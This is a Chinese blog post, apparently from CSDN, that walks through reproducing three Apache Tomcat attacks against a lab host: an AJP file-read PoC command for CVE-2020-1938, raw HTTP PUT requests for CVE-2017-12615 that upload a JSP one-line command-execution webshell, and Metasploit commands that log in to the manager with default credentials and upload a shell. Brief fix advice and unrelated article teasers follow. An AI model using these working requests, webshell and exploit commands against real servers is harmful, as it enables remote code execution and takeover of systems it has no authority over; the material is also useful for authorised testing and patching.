[漏洞复现]Tomcat漏洞复现

最新推荐文章于 2024-08-11 23:50:54 发布
最新推荐文章于 2024-08-11 23:50:54 发布
阅读量4.2k 收藏 6
点赞数 2
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44508748/article/details/105613498
版权

Tomcat_Ajp漏洞

由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件。

影响版本:

  • Apache Tomcat 6
  • Apache Tomcat 7 < 7.0.100
  • Apache Tomcat 8 < 8.5.51
  • Apache Tomcat 9 < 9.0.31

漏洞编号:

CVE-2020-1938

CNVD-2020-10487

漏洞复现:

靶机:192.168.1.3

环境:tomcat 8.5.23

在这里插入图片描述

①端口探测:

靶机8009、8080端口开放。可以进行ajp漏洞探测

在这里插入图片描述

② 利用poc读取配置文件,复现漏洞:

poc地址:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

python poc.py -p 8009 -f "/WEB-INF/web.xml" 192.168.1.3
# 注意poc为py2环境

在这里插入图片描述

③修复建议

1.临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connector port=“8009” protocol="AJP/1.3"redirectPort=“8443” />

2.官方下载最新tomcat:https://tomcat.apache.org/

Tomcat PUT 方法任意写文件

利用环境: Windows+Tomcat 7.0.x+;配置文件readonly=false

影响版本:Apache Tomcat 7.0.0 - 7.0.79。实际Tomcat 5-9均存在类似的利用方式,但这不归属于CVE-2017-12615漏洞。配置文件内容如下:

<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

漏洞编号:

CVE-2017-12615

利用方式1:

PUT /1.jsp%20 HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 532

******************shell*************************

这种方式适合之所以可以成功创建jsp文件是因为Windows下不允许文件名以空格结尾,但是尾部添加空格可以使tomcat认为其不是jsp文件从而交由DefaultServlet处理绕过。这种利用方式适用于Windows服务器+Tomcat 7.x

利用方式2:

PUT /1.jsp::$DATA HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 532

******************shell*************************

这种方式之所以可行是因为利用了Windows环境下NTFS文件格式的特性,NTFS文件格式存在如下的性质,为此同样可以使tomcat认为其不是jsp文件从而交由DefaultServlet处理。这种利用方式适用于Windows系统+Tomcat 7.x

利用方式3:

PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 532

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>


# 访问127.0.0.1:8080/122.jsp?cmd=calc,弹出计算器

这种利用斜杠/绕过适合Windows系统及Linux系统,覆盖了Tomcat 5.x-9.x。
在这里插入图片描述

Tomcat弱口令拿shell

Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。
在这里插入图片描述

弱口令进入后台,上传tomcat.war包,访问上传的shell路径getshell。
在这里插入图片描述

MSF复现:

在这里插入图片描述

use exploit/multi/http/tomcat_mgr_upload
set rhost 192.168.1.10
set rport 8080
set httppassword tomcat
set httpusername tomcat
exploit
# 分别指定主机+端口+用户名&用户密码。利用成功可进行命令执行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Min1996
关注
专栏目录
Apache Tomcat漏洞复现
m0_56578216的博客
09-07 1252
来到vulhub/tomcat/tomcat8/靶场。
CVE-2020-1938 Tomcat AJP漏洞复现
m0_56642842的博客
08-27 506
0x00 简介 Tomcat在server.xml中配置有HTTP连接器和AJP连接器,AJP连接器可以通过AJP协议与另一个web容器进行交互。AJP协议是定向包协议,其使用端口为8009端口,为提高性能,AJP协议采用二进制形势代替文本形势。 0x01漏洞简介 在2020年2月20日,CNVD发布了漏洞公告。该漏洞Tomcat AJP协议存在缺陷而导致,攻击者可以通过构造特定的参数,读取tomcat的webapps/ROOT目录下的任意文件。同时,若该服务器存在文件上传功能,攻击者还可以进一步实现远程
Tomcat】Apache Tomcat多个版本存在本地越权漏洞
cnskylee的博客
02-09 1万+
漏洞CVE-ID:CVE-2022-23181 漏洞风险等级:低(CVSS v2 Base Score: 4.4 | Impact Score: 6.4 | Exploitability Score: 3.4) 漏洞说明(官方):The fix for bug CVE-2020-9484 introduced a time of check, time of use vulnerability that allowed a local attacker to perform actions with t
常见中间件漏洞复现之【Tomcat】!
muyuchen110的博客
08-06 1308
Tomcat介绍JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的⼀款环境。在历史上也披露出来了很多的漏洞 , 这⾥我们讲⼏个经典的漏洞复现漏洞描述由默认值设置为false),攻击者将有可能可通过精⼼构造的攻击请求数据包向服务器上传包含任意代码的 JSP ⽂件,JSP⽂件中的恶意代码将能被服务器执⾏。导致服务器上的数据泄露或获取服务器权限。漏洞原理⽣,(需要允许put请求) , 攻击者可以利⽤PUT⽅法通过精⼼构造的数据包向存在漏洞的服务器⾥⾯上。
渗透学习之漏洞复现
最新发布
Zombie_QP的博客
08-11 472
2)i.d在php中$_REQUEST,自动转为i_d,而 $request_uri 接收i.d就是i.d。这个代码在burp中可以这样写,但是在页面的搜索框中输入的话,要将其编码。然后咋们去进行burpsuit抓包,将抓到的包放入repeater里面。3)注入绕过 =(like) 单引号(十六进制) 空格(/**/)这里我们运用临时文件去做一个绕过,编写一个HTML文件。查看源代码后,发现有防范,那么应该如何去绕过呢?1)hpp全局污染,php接受相同参数。这里的两条限制了长度,限制了字母和数字。
Tomcat 又爆出高危漏洞Tomcat 8.5 ~ 10 中招…
06-27 2622
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。 不要使用含有漏洞的组件每次也都被评为 OWASP 10 大安全漏洞之一。 光这半年以来,所知道的就有 Dubbo、FastJSON、Tomcat: 前段时间这个 Tomcat AJP 协议漏洞大开,2020/06/25 这天 Tomcat 又爆出 HTTP/2 拒绝服务漏洞: http://mail-archives.apache.org/mod
Tomcat 又爆出高危漏洞Tomcat 8.5~10 中招…
热门推荐
CSDN资讯
07-03 1万+
作者 | 栈长来源 | Java技术栈开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏...
Tomcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…
sinat_32849897的博客
07-02 1357
开源界最近很热闹啊,各个主流软件或框架漏洞频发,比如像 Struts2、FastJSON、Dubbo、Redis、Tomcat 等都存在各种各样的漏洞。不要使用含有漏洞的组件每次也都被评...
Tomcat爆出严重漏洞,影响所有版本,附解决方案!
xmt1139057136的专栏
02-22 1万+
作者:业余草来源:https://www.xttblog.com/?p=4809昨天,群里聊嗨了。大家都在远程办公,却都急急忙忙的升级线上的 Tomcat 版本,原因就是 Tomcat ...
apache-tomcat-8.5.57.tar.gz
10-06
官方下载的apache-tomcat-8.5.57.tar.gz,需要用到又嫌麻烦的话可以下载
apache-tomcat[服务器-8.5.57].zip
08-11
tomacat是由Apache所推出的一款专业Servlet容器,可以实现对Servlet和JavaServer Page(JSP)的支持,拥有Tomcat管理和控制平台、安全域管理和Tomcat阀等功能,是配置JSP和进行JAVA必备的一款环境
vulhub Tomcat8漏洞复现
weixin_51441054的博客
03-22 6330
vulhub Tomcat8漏洞复现 搭建一下Tomcat8这个漏洞的环境 查看端口发现是8080端口开放 可以看到环境已经搭建好了 尝试登录问题页面,发现需要输入密码http://...:8080/manager/html 用msf 得到弱口令 成功登入后台 此处可上传文件,尝试上传webshell 上传jsp一句话木马,打包为war格式 上传出现报错,40...
Apache Tomcat文件包含漏洞复现(CVE-2020-1938)
qq_34853514的博客
07-04 5278
漏洞简介 漏洞编号: CVE-2020-1938 漏洞详情: Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。而该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者可通过构造特定参数读取webapp目录下的任意文件。 漏洞影响范围: Apache Tomcat = 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 漏洞复现 环境搭建:
Tomcat漏洞分析利用
weixin_43047908的博客
08-19 1775
目录前言环境搭建漏洞复现CVE-2017-12615CVE-2020-1938 前言 Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Ja
TomcatTomcat多个版本存在信息泄漏漏洞
cnskylee的博客
05-20 3642
官方原文对于该漏洞的描述(看着这描述,比较费力,这里就不做翻译了)When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1
漏洞通告】Apache Tomcat HTTP请求走私漏洞CVE-2022-42252
m0_58094767的博客
12-28 1万+
tomcat漏洞
tomcat tomcat8漏洞复现
2301_76467680的博客
07-03 321
制作WAR包,将JSP木马压缩为ZIP格式,然后修改后缀为war就可以了。拼接/manager/html。
tomcat服务器漏洞复现
06-06
为了复现Tomcat服务器漏洞,你需要先了解Tomcat服务器中存在的漏洞类型及其对应的漏洞代码,然后通过构造特定的http请求来触发漏洞。 以下是一个简单的漏洞复现步骤: 1. 确认Tomcat的版本和具体漏洞类型,可以通过查询漏洞库或Tomcat官方网站获取相关信息。 2. 构造特定的http请求,利用漏洞触发目标Tomcat服务器上的漏洞。例如,如果目标服务器存在目录遍历漏洞,攻击者可以通过构造的http请求访问受保护的文件或目录。 3. 确认漏洞是否被成功利用,可以通过查看服务器的响应或其他日志信息来判断漏洞是否被成功利用。 需要注意的是,漏洞复现过程中需要遵循合法、合规的原则,不得进行非法攻击行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值